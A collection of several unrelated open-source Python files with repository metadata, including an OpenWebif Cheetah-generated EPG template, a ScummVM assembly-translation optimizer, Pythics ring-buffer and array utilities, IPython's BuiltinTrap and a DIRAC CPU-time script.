    main(trajectory_template, ligand_name, topology, reference, processors, off_set, image)
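
# Hedged invocation sketch (added for illustration, not part of the module):
# positional order follows parseArguments() above; every path, glob pattern
# and the LIG resname below are placeholders.
#
#   python dehidratate_and_align.py LIG reference.pdb \
#       "output/topologies/*.prmtop" "output/*/trajectory_*.xtc" \
#       --processors 8 --offset 0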
AdaptivePELE/AdaptivePELE
AdaptivePELE/analysis/dehidratate_and_align.py
Python
mit
2,438
[ "MDTraj" ]
1f51aaf596b9efaaa6532ca4b360d278c300d11005fef858649812305abc50a3
#!/usr/bin/env python ################################################## ## DEPENDENCIES import sys import os import os.path try: import builtins as builtin except ImportError: import __builtin__ as builtin from os.path import getmtime, exists import time import types from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple from Cheetah.Template import Template from Cheetah.DummyTransaction import * from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList from Cheetah.CacheRegion import CacheRegion import Cheetah.Filters as Filters import Cheetah.ErrorCatchers as ErrorCatchers from urllib import quote from Plugins.Extensions.OpenWebif.local import tstrings from json import dumps from Plugins.Extensions.OpenWebif.controllers.views.ajax.renderevtblock import renderEvtBlock ################################################## ## MODULE CONSTANTS VFFSL=valueFromFrameOrSearchList VFSL=valueFromSearchList VFN=valueForName currentTime=time.time __CHEETAH_version__ = '2.4.4' __CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0) __CHEETAH_genTime__ = 1453357629.949636 __CHEETAH_genTimestamp__ = 'Thu Jan 21 15:27:09 2016' __CHEETAH_src__ = '/home/babel/Build/Test/OpenPLi5/openpli5.0/build/tmp/work/tmnanoseplus-oe-linux/enigma2-plugin-extensions-openwebif/1+gitAUTOINC+186ea358f6-r0/git/plugin/controllers/views/ajax/multiepg2.tmpl' __CHEETAH_srcLastModified__ = 'Thu Jan 21 15:27:08 2016' __CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine' if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple: raise AssertionError( 'This template was compiled with Cheetah version' ' %s. Templates compiled before version %s must be recompiled.'%( __CHEETAH_version__, RequiredCheetahVersion)) ################################################## ## CLASSES class multiepg2(Template): ################################################## ## CHEETAH GENERATED METHODS def __init__(self, *args, **KWs): super(multiepg2, self).__init__(*args, **KWs) if not self._CHEETAH__instanceInitialized: cheetahKWArgs = {} allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split() for k,v in KWs.items(): if k in allowedKWs: cheetahKWArgs[k] = v self._initCheetahInstance(**cheetahKWArgs) def channelsInBouquet(self, **KWS): ## CHEETAH: generated from #block channelsInBouquet at line 73, col 1. trans = KWS.get("trans") if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)): trans = self.transaction # is None unless self.awake() was called if not trans: trans = DummyTransaction() _dummyTrans = True else: _dummyTrans = False write = trans.response().write SL = self._CHEETAH__searchList _filter = self._CHEETAH__currentFilter ######################################## ## START - generated method body write(u'''<thead> <tr> ''') for sname, eventlist in VFN(VFFSL(SL,"events",True),"iteritems",False)(): # generated from line 76, col 2 write(u'''\t<th class="border"><div class="service"><img src="''') _v = VFFSL(SL,"picons",True)[VFFSL(SL,"sname",True)] # u'$(picons[$sname])' on line 77, col 52 if _v is not None: write(_filter(_v, rawExpr=u'$(picons[$sname])')) # from line 77, col 52. write(u'''" /> ''') _v = VFFSL(SL,"sname",True) # u'$sname' on line 77, col 74 if _v is not None: write(_filter(_v, rawExpr=u'$sname')) # from line 77, col 74. 
write(u'''</div></th> ''') write(u'''</tr> </thead> ''') ######################################## ## END - generated method body return _dummyTrans and trans.response().getvalue() or "" def respond(self, trans=None): ## CHEETAH: main method generated for this template if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)): trans = self.transaction # is None unless self.awake() was called if not trans: trans = DummyTransaction() _dummyTrans = True else: _dummyTrans = False write = trans.response().write SL = self._CHEETAH__searchList _filter = self._CHEETAH__currentFilter ######################################## ## START - generated method body write(u''' <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="../images/favicon.png"> <link rel="stylesheet" type="text/css" href="../css/style.min.css" /> <link type="text/css" href="../css/jquery-ui-1.8.18.custom.css" rel="stylesheet" />\t <script type="text/javascript" src="../js/jquery-1.6.2.min.js"></script> <script type="text/javascript" src="../js/jquery-ui-1.8.18.custom.min.js"></script> <script type="text/javascript" src="../js/openwebif-1.1.min.js"></script> <script type="text/javascript" src="../js/jquery.fixedheadertable.min.js"></script> <script type="text/javascript">initJsTranslation(''') _v = VFFSL(SL,"dumps",False)(VFFSL(SL,"tstrings",True)) # u'$dumps($tstrings)' on line 17, col 50 if _v is not None: write(_filter(_v, rawExpr=u'$dumps($tstrings)')) # from line 17, col 50. write(u''')</script> <title>Open Webif ''') _v = VFFSL(SL,"tstrings",True)['multi_epg'] # u"$tstrings['multi_epg']" on line 19, col 19 if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['multi_epg']")) # from line 19, col 19. 
write(u'''</title> </head> <body> <style> body {background-image: none;background-color: #FFF; } #tvcontent {padding:0px;} table { font-family: Verdana; font-size: 11px; } tr { vertical-align: top } .service { font-weight: bold; font-size: 12px; color:#fff; background-color: #1c47ae; line-height:30px; padding: 3px; white-space: nowrap; overflow: hidden; width: 184px} .service img { width:50px; height:30px; float:left; margin-right:10px; } .title { font-weight: bold; color: #061c37; } .desc { font-size: 10px; color: #176093; } .even { background-color: #dfeffc; } .border { border-right: 1px solid #4297d7; } .event { cursor: pointer; width: 190px; overflow:hidden; } .bq { background-color: #1c478e; font-size: 11px; font-weight: bold; color: #fff; padding: 2px 4px; line-height: 18px; cursor: pointer; white-space: nowrap; display: inline-block; margin: 1px 1px; } .bq.selected { color: #A9D1FA; } .plus { background-color: #dfeffc; font-size: 13px; font-weight: bold; color: #1c478e; padding: 2px 4px; line-height: 21px; cursor: pointer; white-space: nowrap; } .plus.selected { color: #ea7409; } .timer { color: #f00; font-weight: bold; font-size: 10px; } .timer.disabled { color: #f80; } #eventdescription { width: 375px; height: auto; position: fixed; top: 205px; left: 350px; z-index: 1000; display: none; overflow: auto; } html, body, #tvcontent { width:100%; height:100%;} .fht-table,.fht-table thead,.fht-table tfoot,.fht-table tbody,.fht-table tr,.fht-table th,.fht-table td{font-size:100%;font:inherit;vertical-align:top;margin:0;padding:0} .fht-table{border-collapse:collapse;border-spacing:0} .fht-table-wrapper,.fht-table-wrapper .fht-thead,.fht-table-wrapper .fht-tfoot,.fht-table-wrapper .fht-fixed-column .fht-tbody,.fht-table-wrapper .fht-fixed-body .fht-tbody,.fht-table-wrapper .fht-tbody{overflow:hidden;position:relative} .fht-table-wrapper .fht-fixed-body .fht-tbody,.fht-table-wrapper .fht-tbody{overflow:auto} .fht-table-wrapper .fht-table .fht-cell{overflow:hidden;height:1px} .fht-table-wrapper .fht-fixed-column,.fht-table-wrapper .fht-fixed-body{top:0;left:0;position:absolute} .fht-table-wrapper .fht-fixed-column{z-index:1} #atdialog { width: 90%; height: auto; position: fixed; top: 10px; left: 10px; z-index: 1001; display: none; overflow: auto; } } </style> <div id="tvcontent"> <table style="margin:0"> <tr> ''') for slot in range(0,7): # generated from line 57, col 1 write(u'''\t<td class="plus ''') if VFFSL(SL,"slot",True)==VFFSL(SL,"day",True) : # generated from line 58, col 18 _v = 'selected' if _v is not None: write(_filter(_v)) else: _v = '' if _v is not None: write(_filter(_v)) write(u'''" js:day="''') _v = VFFSL(SL,"slot",True) # u'$(slot)' on line 58, col 69 if _v is not None: write(_filter(_v, rawExpr=u'$(slot)')) # from line 58, col 69. write(u'''">''') _v = VFFSL(SL,"tstrings",True)[("day_" + (time.strftime("%w", time.localtime(time.time()+86400*slot))))] # u'$tstrings[("day_" + (time.strftime("%w", time.localtime(time.time()+86400*slot))))]' on line 58, col 78 if _v is not None: write(_filter(_v, rawExpr=u'$tstrings[("day_" + (time.strftime("%w", time.localtime(time.time()+86400*slot))))]')) # from line 58, col 78. 
write(u'''</td> ''') write(u'''</tr> </table> <table> <tr> ''') for bq in VFFSL(SL,"bouquets",True): # generated from line 65, col 1 write(u'''<td class="bq ''') if VFFSL(SL,"bq",True)[0]==VFFSL(SL,"bref",True) : # generated from line 66, col 15 _v = 'selected' if _v is not None: write(_filter(_v)) else: _v = '' if _v is not None: write(_filter(_v)) write(u'''" js:ref="''') _v = VFFSL(SL,"quote",False)(VFFSL(SL,"bq",True)[0]) # u'$quote($bq[0])' on line 66, col 68 if _v is not None: write(_filter(_v, rawExpr=u'$quote($bq[0])')) # from line 66, col 68. write(u'''">''') _v = VFFSL(SL,"bq",True)[1] # u'$bq[1]' on line 66, col 84 if _v is not None: write(_filter(_v, rawExpr=u'$bq[1]')) # from line 66, col 84. write(u'''</td> ''') write(u'''</tr> </table> ''') renderEventBlock = VFFSL(SL,"renderEvtBlock",False)() write(u'''<table cellpadding="0" cellspacing="0" id="TBL1"> ''') self.channelsInBouquet(trans=trans) write(u'''<tbody> ''') hasEvents = False for slot in range(0,12): # generated from line 84, col 2 write(u'''<tr class="''') _v = VFFSL(SL,"slot",True)%2 and 'odd' or 'even' # u"$(slot%2 and 'odd' or 'even')" on line 85, col 12 if _v is not None: write(_filter(_v, rawExpr=u"$(slot%2 and 'odd' or 'even')")) # from line 85, col 12. write(u'''"> ''') for sname, eventlist in VFN(VFFSL(SL,"events",True),"iteritems",False)(): # generated from line 86, col 2 write(u'''<td class="border"> ''') for event in VFFSL(SL,"eventlist",True)[VFFSL(SL,"slot",True)]: # generated from line 88, col 2 write(u'''\t\t''') _v = VFN(VFFSL(SL,"renderEventBlock",True),"render",False)(VFFSL(SL,"event",True)) # u'$renderEventBlock.render($event)' on line 89, col 3 if _v is not None: write(_filter(_v, rawExpr=u'$renderEventBlock.render($event)')) # from line 89, col 3. write(u''' ''') hasEvents = True write(u'''</td> ''') write(u'''</tr> ''') write(u'''</tbody> </table> </div> <div id="eventdescription"></div> <div id="atdialog"> <div id="toolbar-header" class="athandle" style="height:30px;cursor:move"> <div id="leftmenu_expander_main" class="leftmenu_icon leftmenu_icon_collapse" onclick="$(\'#atdialog\').hide(200)"></div> </div> <div id="content_container"></div></div> ''') if VFFSL(SL,"reloadtimer",True)==1: # generated from line 105, col 1 write(u'''<div id="editTimerForm" title="''') _v = VFFSL(SL,"tstrings",True)['edit_timer'] # u"$tstrings['edit_timer']" on line 106, col 32 if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['edit_timer']")) # from line 106, col 32. write(u'''"></div> ''') write(u''' <script> var picons = ''') _v = VFFSL(SL,"dumps",False)(VFFSL(SL,"picons",True)) # u'$dumps($picons)' on line 110, col 14 if _v is not None: write(_filter(_v, rawExpr=u'$dumps($picons)')) # from line 110, col 14. write(u'''; var reloadTimers = false; $(".bq").click(function() { \tvar id = $(this).attr("js:ref"); \t$("#tvcontent").html(loadspinner).load(\'../ajax/multiepg2?reloadtimer=0&bref=\'+id); }); $(".event").click(function() { \tvar id = $(this).attr("js:id"); \tvar ref = $(this).attr("js:ref"); \t$("#eventdescription").load(\'../ajax/event?idev=\'+id+\'&sref=\'+escape(ref), function() { \t\t$("#eventdescription").show(200).draggable( { handle: ".handle" } ); \t}); }); $(".plus").click(function() { \tvar day = $(this).attr("js:day"); \t$("#tvcontent").html(loadspinner).load(\'../ajax/multiepg2?reloadtimer=0&bref=''') _v = VFFSL(SL,"quote",False)(VFFSL(SL,"bref",True)) # u'${quote($bref)}' on line 125, col 80 if _v is not None: write(_filter(_v, rawExpr=u'${quote($bref)}')) # from line 125, col 80. 
write(u"""&day='+day); }); $('#editTimerForm').load('../ajax/edittimer'); $('#TBL1').fixedHeaderTable({ \tfooter: true, \tcloneHeadToFoot: true, \taltClass: 'odd', \tautoShow: true }); </script> </body> </html> """) ######################################## ## END - generated method body return _dummyTrans and trans.response().getvalue() or "" ################################################## ## CHEETAH GENERATED ATTRIBUTES _CHEETAH__instanceInitialized = False _CHEETAH_version = __CHEETAH_version__ _CHEETAH_versionTuple = __CHEETAH_versionTuple__ _CHEETAH_genTime = __CHEETAH_genTime__ _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__ _CHEETAH_src = __CHEETAH_src__ _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__ _mainCheetahMethod_for_multiepg2= 'respond' ## END CLASS DEFINITION if not hasattr(multiepg2, '_initCheetahAttributes'): templateAPIClass = getattr(multiepg2, '_CHEETAH_templateClass', Template) templateAPIClass._addCheetahPlumbingCodeToClass(multiepg2) # CHEETAH was developed by Tavis Rudd and Mike Orr # with code, advice and input from many other volunteers. # For more information visit http://www.CheetahTemplate.org/ ################################################## ## if run from command line: if __name__ == '__main__': from Cheetah.TemplateCmdLineIface import CmdLineIface CmdLineIface(templateObj=multiepg2()).run()
MOA-2011/e2openplugin-OpenWebif
plugin/controllers/views/ajax/multiepg2.py
Python
gpl-2.0
15,057
[ "VisIt" ]
e665a8acecd0a4ab78f2ebe377e86e9c26eb7d68920e42d3ae76441ba86f70ac
# ScummVM - Graphic Adventure Engine # # ScummVM is the legal property of its developers, whose names # are too numerous to list here. Please refer to the COPYRIGHT # file distributed with this source distribution. # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # import re import op class proc: last_addr = 0xc000 def __init__(self, name): self.name = name self.calls = [] self.stmts = [] self.labels = set() self.retlabels = set() self.__label_re = re.compile(r'^(\S+):(.*)$') self.offset = proc.last_addr proc.last_addr += 4 def add_label(self, label): self.stmts.append(op.label(label)) self.labels.add(label) def remove_label(self, label): try: self.labels.remove(label) except: pass for i in xrange(len(self.stmts)): if isinstance(self.stmts[i], op.label) and self.stmts[i].name == label: self.stmts[i] = op._nop(None) return def optimize_sequence(self, cls): i = 0 stmts = self.stmts while i < len(stmts): if not isinstance(stmts[i], cls): i += 1 continue if i > 0 and isinstance(stmts[i - 1], op._rep): #skip rep prefixed instructions for now i += 1 continue j = i + 1 while j < len(stmts): if not isinstance(stmts[j], cls): break j = j + 1 n = j - i if n > 1: print "Eliminate consequtive storage instructions at %u-%u" %(i, j) for k in range(i+1,j): stmts[k] = op._nop(None) stmts[i].repeat = n else: i = j i = 0 while i < len(stmts): if not isinstance(stmts[i], op._rep): i += 1 continue if i + 1 >= len(stmts): break if isinstance(stmts[i + 1], cls): stmts[i + 1].repeat = 'cx' stmts[i + 1].clear_cx = True stmts[i] = op._nop(None) i += 1 return def optimize(self, keep_labels=[]): print "optimizing..." #trivial simplifications while len(self.stmts) and isinstance(self.stmts[-1], op.label): print "stripping last label" self.stmts.pop() #mark labels that directly precede a ret for i in range(len(self.stmts)): if not isinstance(self.stmts[i], op.label): continue j = i while j < len(self.stmts) and isinstance(self.stmts[j], (op.label, op._nop)): j += 1 if j == len(self.stmts) or isinstance(self.stmts[j], op._ret): print "Return label: %s" % (self.stmts[i].name,) self.retlabels.add(self.stmts[i].name) #merging push ax pop bx constructs i = 0 while i + 1 < len(self.stmts): a, b = self.stmts[i], self.stmts[i + 1] if isinstance(a, op._push) and isinstance(b, op._pop): ar, br = a.regs, b.regs movs = [] while len(ar) and len(br): src = ar.pop() dst = br.pop(0) movs.append(op._mov2(dst, src)) if len(br) == 0: self.stmts.pop(i + 1) print "merging %d push-pops into movs" %(len(movs)) for m in movs: print "\t%s <- %s" %(m.dst, m.src) self.stmts[i + 1:i + 1] = movs if len(ar) == 0: self.stmts.pop(i) else: i += 1 #eliminating unused labels for s in list(self.stmts): if not isinstance(s, op.label): continue print "checking label %s..." 
%s.name used = s.name in keep_labels if s.name not in self.retlabels: for j in self.stmts: if isinstance(j, op.basejmp) and j.label == s.name: print "used" used = True break if not used: print self.labels self.remove_label(s.name) #removing duplicate rets and rets at end for i in xrange(len(self.stmts)): if isinstance(self.stmts[i], op._ret): j = i+1 while j < len(self.stmts) and isinstance(self.stmts[j], op._nop): j += 1 if j == len(self.stmts) or isinstance(self.stmts[j], op._ret): self.stmts[i] = op._nop(None) self.optimize_sequence(op._stosb); self.optimize_sequence(op._stosw); self.optimize_sequence(op._movsb); self.optimize_sequence(op._movsw); def add(self, stmt): #print stmt comment = stmt.rfind(';') if comment >= 0: stmt = stmt[:comment] stmt = stmt.strip() r = self.__label_re.search(stmt) if r is not None: #label self.add_label(r.group(1).lower()) #print "remains: %s" %r.group(2) stmt = r.group(2).strip() if len(stmt) == 0: return s = stmt.split(None) cmd = s[0] cl = getattr(op, '_' + cmd) arg = " ".join(s[1:]) if len(s) > 1 else str() o = cl(arg) self.stmts.append(o) def __str__(self): r = [] for i in self.stmts: r.append(i.__str__()) return "\n".join(r) def visit(self, visitor, skip = 0): for i in xrange(skip, len(self.stmts)): self.stmts[i].visit(visitor)
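
# Hedged usage sketch (added for illustration, not part of the original
# tool): feeding a proc a few assembly lines and optimizing it. Each
# mnemonic must exist as a class in the companion 'op' module (op._mov,
# op._ret, ...), which is an assumption here.
#
#   p = proc("example")
#   p.add("start: mov ax, 1")
#   p.add("ret")
#   p.optimize(keep_labels=["start"])
#   print p  # py2 codebase, hence the print statement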
vanfanel/scummvm
devtools/tasmrecover/tasm/proc.py
Python
gpl-2.0
5,172
[ "VisIt" ]
7a8da207a2065c3a38c8abf70f6809c5d002842add2ce316b728c8719adc1ea6
# -*- coding: utf-8 -*- # # Copyright 2008 - 2013 Brian R. D'Urso # # This file is part of Python Instrument Control System, also known as Pythics. # # Pythics is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Pythics is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Pythics. If not, see <http://www.gnu.org/licenses/>. # # # load libraries # import time import numpy as np # # A buffer for appending data to plots in chunks instead of one point at a time # class AppendBuffer(object): def __init__(self, plot, cols, length, key=None): self.plot = plot self.data = np.zeros([length, cols]) self.length = length self.key = key self.n = 0 def append(self, data): self.data[self.n] = data self.n += 1 if self.n == self.length: if self.key is None: self.plot.append(self.data) else: self.plot.append(self.key, self.data) self.n = 0 def flush(self): if self.n != 0: if self.key is None: self.plot.append(self.data[0:self.n]) else: self.plot.append(self.key, self.data[0:self.n]) self.n = 0 def clear(self): self.n = 0 # # A simple timer useful for updating the GUI every dt seconds # class UpdateTimer(object): def __init__(self, dt=1.0): self.dt = dt self.force = False self.last_time = time.time() def check(self): t = time.time() if ((t - self.last_time) >= self.dt) or self.force: self.last_time = t self.force = False return True else: return False def trigger(self): self.force = True def save_array(data, filename, separator=', ', format='%e', header=None): with open(filename, 'w') as file: if header != None: file.write('%s\n' % header) for row in data: file.write('%s\n' % separator.join([format % val for val in row])) def read_array(filename, separator=', ', comment='#', dtype='float'): with open(filename, "r") as file: data = [] for line in file: stripped_line = line.strip() if len(stripped_line) != 0 and stripped_line[0] != comment: items = stripped_line.split(separator) data.append(map(np.cast[dtype], items)) a = np.array(data, dtype=dtype) return(a) # # Writes array data to file one row at a time # class ArrayFile(object): def __init__(self, filename, separator=', ', format='%e', header=None, mode='w'): self.__file = open(filename, mode) self.separator = separator self.format = format if mode == 'w' and header != None: self.__file.write('%s\n' % header) def write(self, data): self.__file.write('%s\n' % self.separator.join([self.format % val for val in data])) def write_array(self, data): for row in data: self.__file.write('%s\n' % self.separator.join([self.format % val for val in row])) def flush(self): self.__file.flush() def close(self): self.__file.close() # # Circular array for storing and retrieving time series data # class RingBuffer(object): def __init__(self, length, width=1, value=0, dtype=np.float64): self.__width = width # actual array size is twice the requested self.__N = int(length) # the next place to put a value in the buffer self.__n = 0 self.__data = value*np.ones((2*self.__N, self.__width), dtype=dtype) def clear(self, value=0): self.__data = 0 * self.__data + value def read(self, start=-1, stop=0): # choose the copy of the data which is guaranteed 
to be contiguous n = ((self.__n - 1) % self.__N) + self.__N + 1 return self.__data[n+start:n+stop] def write(self, value): # put data in two places so we can always slice out a contiguous array n = self.__n m = n + self.__N self.__data[n] = value self.__data[m] = value self.__n = (self.__n + 1) % self.__N def write_array(self, value): # for small arrays, it may be faster to just loop over written array, # for example #for i in range(value.shape[0]): # self.write(value[i]) # for large arrays, we can avoid loops n = self.__n m = n + self.__N L = value.shape[0] # grab only last N elements if value array is too long if L > self.__N: L = self.__N value = value[-L:] # n is smaller, so writing is contiguous starting at n self.__data[n:n+L] = value # writing at m must generally be broken up into two parts # the second part must be wrapped around wrapped_L = m + L - 2*self.__N if wrapped_L <= 0: # no need for wrapping self.__data[m:m+L] = value else: unwrapped_L = L - wrapped_L self.__data[m:m+unwrapped_L] = value[0:unwrapped_L] self.__data[0:wrapped_L] = value[unwrapped_L:L] self.__n = (self.__n + L) % self.__N # # Circular array for storing and retrieving time series data # class CircularArray(object): def __init__(self, length, cols=1, dtype=np.float64): self.__cols = cols # actual array size is twice the requested self.__N = int(length) # the next place to put a value in the buffer self.__n_next = 0 self.__data = np.zeros((2*self.__N, self.__cols), dtype=dtype) # the number of rows that have been filled, max is self.__N self.__n_filled = 0 # properties of arrays self.ndim = 2 def clear(self): self.__n_filled = 0 def append(self, value): # convert the appended object to an array if it starts as something else if type(value) is not np.ndarray: value = np.array(value) # add the data if value.ndim == 1: # adding a single row of data # put data in two places so we can always find a contiguous array n = self.__n_next m = n + self.__N self.__data[n] = value self.__data[m] = value self.__n_next = (self.__n_next + 1) % self.__N self.__n_filled = min(self.__n_filled+1, self.__N) elif value.ndim == 2: # adding multiple rows of data # avoid loops for appending large arrays n = self.__n_next m = n + self.__N L = value.shape[0] # grab only last N elements if value array is too long if L > self.__N: L = self.__N value = value[-L:] # n is smaller, so writing is contiguous starting at n self.__data[n:n+L] = value # writing at m must generally be broken up into two parts # the second part must be wrapped around wrapped_L = m + L - 2*self.__N if wrapped_L <= 0: # no need for wrapping self.__data[m:m+L] = value else: unwrapped_L = L - wrapped_L self.__data[m:m+unwrapped_L] = value[0:unwrapped_L] self.__data[0:wrapped_L] = value[unwrapped_L:L] self.__n_next = (self.__n_next + L) % self.__N self.__n_filled = min(self.__n_filled+L, self.__N) def __as_array(self): # choose the copy of the data which is guaranteed to be contiguous n = ((self.__n_next - 1) % self.__N) + self.__N + 1 return self.__data[n-self.__n_filled:n] # some standard array methods @property def shape(self): return (self.__n_filled, self.__cols) def __getitem__(self, key): return self.__as_array().__getitem__(key) def __iter__(self): return self.__as_array().__iter__() def __len__(self): return self.__n_filled def __repr__(self): return self.__as_array().__repr__() def __setitem__(self, key, value): # this is inefficient but simple # rewrite the whole array for any change a = self.__as_array() a.__setitem__(key, value) self.clear() self.append(a) def 
__str__(self): return self.__as_array().__str__() def sum(self, *args, **kwargs): return self.__as_array().sum(*args, **kwargs) class GrowableArray(object): def __init__(self, length, cols=1, dtype=np.float64): self.__cols = cols self.__initial_length = int(length) # number of rows to grow by if we run out of space self.__n_grow = self.__initial_length self.__dtype = dtype self.clear() # properties of arrays self.ndim = 2 def clear(self): # actual array size self.__N = self.__initial_length # the next place to put a value in the buffer # also the number of rows that have been filled self.__n = 0 # allocate the initial data self.__data = np.zeros((self.__N, self.__cols), dtype=self.__dtype) def append(self, value): # convert the appended object to an array if it starts as something else if type(value) is not np.ndarray: value = np.array(value) # add the data if value.ndim == 1: # adding a single row of data n = self.__n if n + 1 > self.__N: # need to allocate more memory self.__N += self.__n_grow self.__data = np.resize(self.__data, (self.__N, self.__cols)) self.__data[n] = value self.__n = n + 1 elif value.ndim == 2: # adding multiple rows of data # avoid loops for appending large arrays n = self.__n L = value.shape[0] N_needed = n + L - self.__N if N_needed > 0: # need to allocate more memory self.__N += (N_needed / self.__n_grow + 1) * self.__n_grow self.__data = np.resize(self.__data, (self.__N, self.__cols)) self.__data[n:n+L] = value self.__n += L def __as_array(self): return self.__data[:self.__n] # some standard array methods @property def shape(self): return (self.__n, self.__cols) def __getitem__(self, key): return self.__as_array().__getitem__(key) def __iter__(self): return self.__as_array().__iter__() def __len__(self): return self.__n def __repr__(self): return self.__as_array().__repr__() def __setitem__(self, key, value): return self.__as_array().__setitem__(key, value) def __str__(self): return self.__as_array().__str__() def sum(self, *args, **kwargs): return self.__as_array().sum(*args, **kwargs)
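

#
# Hedged demo (added for illustration, not part of the original library):
# exercising CircularArray and GrowableArray; sizes and values are arbitrary.
#
if __name__ == '__main__':
    ca = CircularArray(5, cols=2)
    ca.append(np.arange(16, dtype=np.float64).reshape(8, 2))  # keeps the last 5 rows
    print(ca.shape)  # -> (5, 2)
    ga = GrowableArray(4, cols=1)
    for i in range(10):
        ga.append(np.array([float(i)]))  # grows past the initial length of 4
    print(len(ga))   # -> 10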
LunarLanding/Pythics
pythics/lib.py
Python
gpl-3.0
11,469
[ "Brian" ]
e27b18d3be6083ebef9f8f7fd4a5ccfd3e4a021ac34b4bab7324a6e526f9ffb5
""" A context manager for managing things injected into :mod:`__builtin__`. Authors: * Brian Granger * Fernando Perez """ #----------------------------------------------------------------------------- # Copyright (C) 2010-2011 The IPython Development Team. # # Distributed under the terms of the BSD License. # # Complete license in the file COPYING.txt, distributed with this software. #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- from traitlets.config.configurable import Configurable from IPython.utils.py3compat import builtin_mod, iteritems from traitlets import Instance #----------------------------------------------------------------------------- # Classes and functions #----------------------------------------------------------------------------- class __BuiltinUndefined(object): pass BuiltinUndefined = __BuiltinUndefined() class __HideBuiltin(object): pass HideBuiltin = __HideBuiltin() class BuiltinTrap(Configurable): shell = Instance('IPython.core.interactiveshell.InteractiveShellABC', allow_none=True) def __init__(self, shell=None): super(BuiltinTrap, self).__init__(shell=shell, config=None) self._orig_builtins = {} # We define this to track if a single BuiltinTrap is nested. # Only turn off the trap when the outermost call to __exit__ is made. self._nested_level = 0 self.shell = shell # builtins we always add - if set to HideBuiltin, they will just # be removed instead of being replaced by something else self.auto_builtins = {'exit': HideBuiltin, 'quit': HideBuiltin, 'get_ipython': self.shell.get_ipython, } # Recursive reload function try: from IPython.lib import deepreload if self.shell.deep_reload: from warnings import warn warn("Automatically replacing builtin `reload` by `deepreload.reload` is deprecated and will be removed in IPython 6.0, please import `reload` explicitly from `IPython.lib.deeprelaod", DeprecationWarning) self.auto_builtins['reload'] = deepreload._dreload else: self.auto_builtins['dreload']= deepreload._dreload except ImportError: pass def __enter__(self): if self._nested_level == 0: self.activate() self._nested_level += 1 # I return self, so callers can use add_builtin in a with clause. 
return self def __exit__(self, type, value, traceback): if self._nested_level == 1: self.deactivate() self._nested_level -= 1 # Returning False will cause exceptions to propagate return False def add_builtin(self, key, value): """Add a builtin and save the original.""" bdict = builtin_mod.__dict__ orig = bdict.get(key, BuiltinUndefined) if value is HideBuiltin: if orig is not BuiltinUndefined: #same as 'key in bdict' self._orig_builtins[key] = orig del bdict[key] else: self._orig_builtins[key] = orig bdict[key] = value def remove_builtin(self, key, orig): """Remove an added builtin and re-set the original.""" if orig is BuiltinUndefined: del builtin_mod.__dict__[key] else: builtin_mod.__dict__[key] = orig def activate(self): """Store ipython references in the __builtin__ namespace.""" add_builtin = self.add_builtin for name, func in iteritems(self.auto_builtins): add_builtin(name, func) def deactivate(self): """Remove any builtins which might have been added by add_builtins, or restore overwritten ones to their previous values.""" remove_builtin = self.remove_builtin for key, val in iteritems(self._orig_builtins): remove_builtin(key, val) self._orig_builtins.clear() self._builtins_added = False
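
# Hedged usage sketch (added for illustration, not part of IPython): the trap
# is normally entered around user-code execution, roughly as below, where
# 'shell' is an InteractiveShell instance (assumed here).
#
#   trap = BuiltinTrap(shell=shell)
#   with trap:                      # installs exit/quit/get_ipython
#       exec(user_code, shell.user_ns)
#   # originals are restored once the outermost 'with' block exits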
boompieman/iim_project
project_python2/lib/python2.7/site-packages/IPython/core/builtin_trap.py
Python
gpl-3.0
4,283
[ "Brian" ]
1537e44a1f54dcf1c149f0fa994d3ab3f06fe2e9e0bcdc6a9ef71447e603131a
#!/usr/bin/env python ######################################################################## # File : dirac-wms-get-queue-cpu-time.py # Author : Federico Stagni ######################################################################## """ Report CPU length of queue, in seconds This script is used by the dirac-pilot script to set the CPUTime left, which is a limit for the matching """ from __future__ import print_function from __future__ import absolute_import from __future__ import division import DIRAC from DIRAC.Core.Utilities.DIRACScript import DIRACScript as Script @Script() def main(): Script.registerSwitch("C:", "CPUNormalizationFactor=", "CPUNormalizationFactor, in case it is known") Script.parseCommandLine(ignoreErrors=True) CPUNormalizationFactor = 0.0 for unprocSw in Script.getUnprocessedSwitches(): if unprocSw[0] in ("C", "CPUNormalizationFactor"): CPUNormalizationFactor = float(unprocSw[1]) from DIRAC.WorkloadManagementSystem.Client.CPUNormalization import getCPUTime cpuTime = getCPUTime(CPUNormalizationFactor) # I hate this kind of output... PhC print("CPU time left determined as", cpuTime) DIRAC.exit(0) if __name__ == "__main__": main()
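
# Hedged invocation sketch (added for illustration, not part of DIRAC): the
# pilot script would call this as, e.g., one of the following; the factor
# value is a placeholder.
#
#   dirac-wms-get-queue-cpu-time
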